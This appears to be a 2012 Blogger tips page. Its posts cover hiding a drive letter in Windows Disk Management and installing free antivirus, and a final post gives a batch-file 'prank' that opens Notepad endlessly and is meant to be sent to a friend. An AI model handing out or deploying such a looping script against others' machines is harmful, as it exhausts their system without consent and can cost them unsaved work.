This is default featured slide 1 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

This is default featured slide 2 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

This is default featured slide 3 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

This is default featured slide 4 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

This is default featured slide 5 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

Showing posts with label Tips Tricks. Show all posts
Showing posts with label Tips Tricks. Show all posts

Wednesday, 19 December 2012

Simple method to Hide your Disk Drive

Here is a simple method to hide ur disk drive
>>Open control panel
>>Go to administrative tools
>>Click computer managment
>>Now a window will appear
>>Click disk managment on the left column now u will see al disk drives
>>Suppose u have to hide local disk E
>>Right click on local disk E and choose "change drive letter and paths" now a small window will appear showing ur letter"E" click remove and then ok.....

Open my computer u will not see local disk E to bring back repeat the abv steps but when u open disk managment the drive that is hidden will b without any letter
>>Right click on it and
>>Choose "change drive letter and paths"
>>Press add and than ok

Monday, 17 December 2012

Free Antivirus install on PC

How to Install Antivirus Software (for Beginners)

Anyone running a Windows computer knows how important it is to have good anti-virus software. If someone you know still doesn't have anti-virus software running, here's a quick guide you can send them to help them set it up.

The video above should walk you through most of the process, but you can read through the steps below as well. We're going to use Microsoft Security Essentials for this demo, since it's very easy to use and does a great job of protecting you from viruses. There's really no need to spend money on anti-virus software when Microsoft's offerings are more than good enough.

  1. Head over to the Microsoft Security Essentials page and download the software. Double-click on the installer to begin the installation process.
  2. The installation should be pretty self-explanatory. Just follow the steps it gives you. Make sure you've checked the box to when prompted, and give the whole thing a few minutes to install.
  3. When it's done, it will ask you to run a scan. Hit yes, and it will download the latest virus definitions and run its first scan. All of this will take a few minutes, so just leave the program alone and let it do its thing.
  4. When it's finished it's scan (hopefully without finding anything), it will begin monitoring your computer. Click the "Change My Scan Schedule" button to schedule a regular scan of your computer. I usually like to run mine on Sunday at 2:00 AM, when I know I'll be sleeping. Save your settings and you're done!

Now, Microsoft Security Essentials will run in the background, constantly monitoring your computer for any viruses. If it catches anything, it will let you know and tell you how to proceed. It will also run a scan during the time you've scheduled it for, so make sure your computer's running at that time (in the above case, Sunday at 2 AM). You can check to make sure it's running by going to your system tray in the bottom-right corner and looking for the green castle icon.

Remember, good anti-virus software is important, but even more important is practicing safe browsing habits. The best way to avoid viruses is to make sure you don't download them in the first place. Don't click on anything that claims its anti-virus software unless you know where it came from, don't click on any suspicious Facebook posts, and make sure that you don't click on any fake email links. If you get an email from ebay.com, hover over the link and look at the bottom of your screen to make sure it actually goes to somewhere at —if it goes somewhere else, it's probably going to harm your computer.

Notepad Trick to ..........(Open to See)

This simple computer prank consists of a code below that will drive your friend crazy as it opens notepad continuously. When you type the below code and rename it as *.bat it take the above showed icon shape. To Open Notepad continuously in your friend’s computer: Type the code in notepad as : @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Save it as “notepad.BAT” and send it.
Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So, If you want to try this than save all your work and then run this file.